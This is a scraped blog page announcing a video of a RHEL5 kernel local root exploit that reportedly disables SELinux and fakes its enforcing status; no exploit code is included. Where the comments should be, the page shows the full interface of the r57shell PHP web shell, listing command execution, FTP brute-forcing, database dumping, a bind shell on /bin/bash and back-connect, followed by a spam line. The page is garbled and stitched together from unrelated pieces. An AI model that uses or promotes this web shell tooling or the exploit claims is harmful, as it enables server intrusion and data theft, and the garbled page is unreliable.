Kernel Bench

Kernel News and How To

21
Sep

RHEL5 2.6.18-157 Local Kernel Exploit 0day, disables SELinux

by admin
Redhat Kernel

Same exploit as the previous two videos, this time on a new target: RHEL5 2.6.18-157
Same destruction commences ;)

Ah I forgot to show in the video after I got root that SELinux was still reporting being in enforcing mode, since the same code that faked that information for 2.6.30 worked fine with the 2.6.18.

I had to remove some part of me typing near the very end so that the video could fit in the 10min restriction, nothing before that was edited.

Duration : 0:9:59


Technorati Tags: , , , , , , ,

8 Comments
, , , , , , ,
13

8 Comments

r57shell 404 Not Found

404 Not Found

The server can not find the requested page:

127.0.0.1/r57shell/version.php?version=124 (port 80)

Please forward this error screen to 127.0.0.1's WebMaster.

   !  r57shell 1.24   08-02-2012 00:11:37  [ phpinfo ]  [ php.ini ]  [ cpu ]  [ mem ]  [ users ]  [ tmp ]  [ delete ]
  safe_mode: OFF  PHP version: 5.2.17  cURL: ON  MySQL: ON  MSSQL: OFF  PostgreSQL: ON  Oracle: OFF
  Disable functions : NONE
  HDD Free : 340.82 GB HDD Total : 802.94 GB
uname -a : 
sysctl : 
$OSTYPE : 
Server : 
id : 
pwd : 
   Linux useast6.myserverhosts.com 2.6.18-338.5.1.el5.lve0.8.29 #1 SMP Sat Apr 23 01:52:48 EEST 2011 x86_64 x86_64 x86_64 G
   -
   linux-gnu
   Apache
   uid=1610(kernelx7) gid=1598(kernelx7) groups=1598(kernelx7)
   /home/kernelx7/public_html   ( drwxr-x--- )
Executed command: ls -lia
:: Execute command on server  ::
Run command ?
Work directory ?    
:: Edit files  ::
File for edit ?    
:: Aliases  ::
         Select alias ?        
:: Find text in files  ::
Find text ?    
In dirs ? * ( /root;/home;/tmp )
Only in files ?* ( .txt;.php;.htm )
:: Search text in files via find  ::
Text for find ?    
Find in folder ? * ( /root;/home;/tmp )
Find in files ? * you can use regexp
:: Eval PHP code  ::

 
:: Upload files on server  ::
Local file ?
 New name ?    
:: Upload files from remote server  ::
With ?  Remote file ?
Local file ?    
:: Download files from server  ::
file ?    
Archivation ? without archivation zip gzip bzip
:: FTP  ::
Download files from remote ftp-server
FTP-server:port ?
Login ?
Password ?
File on ftp ?
Local file ?
Transfer mode ?
Send file to remote ftp server
FTP-server:port ?
Login ?
Password ?
Local file ?
File on ftp ?
Transfer mode ?
:: FTP-bruteforce  ::
FTP-server:port ?    
* use username from /etc/passwd for ftp login and password ( Users list )
Use reverse (user -> resu) login for password
:: Mail  ::
Send email
To ?
From ?
Subj ?
Mail ?
Send file to email
To ?
From ?
Subj ?
Local file ?
Archivation ? without archivation zip gzip bzip
:: Databases  ::
Show database structure
Type ?
Port ?
Login ?
Password ?
show tables ?
show columns ?
Dump database table
Type ?
Port ?
Login ?
Password ?
Database ?
Table ?
Save dump in file ?
file ?
Run SQL query
Type ?
Port ?
Login ?
Password ?
Database ?
SQL query ?

:: Net  ::
Bind port to /bin/bash
Port ?
Password for access ?
Use ?
back-connect
IP ?
Port ?
Use ?
datapipe
Local port ?
Remote host ?
Remote port ?
Use ?
o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version 1.24 ]---o

 WP Glamour
Kernel Bench is proudly powered by WordPress
Entries (RSS) and Comments (RSS).

192.168.1.1
100 mg viagra